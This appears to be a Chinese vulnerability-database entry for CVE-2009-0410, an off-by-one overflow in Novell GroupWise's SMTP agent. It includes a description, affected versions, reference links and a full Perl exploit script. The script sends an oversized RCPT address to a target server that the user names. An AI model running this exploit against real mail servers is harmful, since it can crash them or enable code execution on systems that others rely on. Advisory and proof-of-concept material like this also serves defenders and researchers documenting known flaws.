https://www.exploit-db.com/exploits/7985
https://www.securityfocus.com/bid/33560
https://cxsecurity.com/issue/WLB-2009020104
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-057
Novell GroupWise RCPT命令单字节溢出漏洞






漏洞ID | 1117347 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 2009-02-04 | 更新时间 | 2009-02-06 |
![]() |
CVE-2009-0410 | ![]() |
CNNVD-200902-057 |
漏洞平台 | Windows | CVSS评分 | 10.0 |
|漏洞来源
|漏洞详情
NovellGroupWise是美国Novell公司的一套协作通讯系统。该系统提供了电子邮件、日程安排、即时通讯、任务管理、文档管理以及联系人管理等协作通讯服务。GroupWiseInternetAgent的SMTP守护程序在处理畸形的RCPT命令参数时存在单字节溢出漏洞。如果用户发送的邮件包含有超长的地址的话,就可以触发这个溢出,导致拒绝服务或执行任意代码。
|漏洞EXP
#!usr/bin/perl -w
#######################################################################################
###############################QUICK AND DIRTY EXPLOIT#################################
#######################################################################################
# Off-by-one error in the SMTP daemon in GroupWise Internet Agent (GWIA)
# in Novell GroupWise 6.5x, 7.0, 7.01, 7.02, 7.03, 7.03HP1a, and 8.0 allows
# remote attackers to execute arbitrary code via a long e-mail address in a
# malformed RCPT command, leading to a buffer overflow.
# Refer:
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0410
#
# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with
# "#!Installation_path_for_perl -w" (say #!C:/Program Files/Perl/bin/perl -w)
#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
#
# Author: Praveen Darshanam
# Email: praveen[underscore]recker[at]sify.com\
# Blog: http://www.darshanams.blogspot.com/
# Date: 04th February, 2009
#
########Thanx to str0ke, milw0rm, @rp m@n, an all the security folks####################
########################################################################################
use Net::SMTP;
print "***SMTP module is working fine***\n";
$buff="D" x 1300;
print "Enter Vulnerable Novell GroupWise SMTP Server Domain Name\n";
$smtp_vuln_server_name=<STDIN>;
chop($smtp_vuln_server_name);
$smtp_attack=Net::SMTP->new("$smtp_vuln_server_name");
print"\nEnter your/from mail ID here\n";
$$mail_from=<STDIN>;
chop($mail_from);
print"\nEnter Recepient mail ID\n";
$to_mail_id=<STDIN>;
chop($to_mail_id);
$mal_buffer=$buff.$to_mail_id;
$smtp_attack->mail($mail_from);
$smtp_attack->to($mal_buffer);
$smtp_attack->data();
$smtp_attack->datasend("Attacking...");
$smtp_attack->quit();
# milw0rm.com [2009-02-04]
|受影响的产品
Novell Groupwise 7.0
Novell Groupwise 6.5.7
Novell Groupwise 6.5.6
Novell Groupwise 6.5.4
Novell Groupwise 6.5.3
Novell Groupwise 6.5.2
Novell Groupwise
|参考资料
来源:MISC
链接:http://www.zerodayinitiative.com/advisories/ZDI-09-010/
来源:download.novell.com
链接:http://download.novell.com/Download?buildid=GjZRRdqCFW0
来源:BID
名称:33560
链接:http://www.securityfocus.com/bid/33560
来源:BUGTRAQ
名称:20090202ZDI-09-010:NovellNetwareGroupwiseGWIARCPTCommandBufferOverflowVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/500609/100/0/threaded
来源:www.novell.com
链接:http://www.novell.com/support/viewContent.do?externalId=7002502
来源:SECUNIA
名称:33744
链接:http://secunia.com/advisories/33744
检索漏洞
开始时间
结束时间